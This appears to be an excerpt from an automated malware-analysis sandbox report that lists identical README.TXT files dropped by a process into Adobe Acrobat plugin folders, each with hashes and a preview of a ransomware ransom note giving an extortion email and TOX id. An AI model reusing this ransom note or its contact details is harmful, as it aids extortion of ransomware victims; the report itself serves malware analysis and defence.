                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

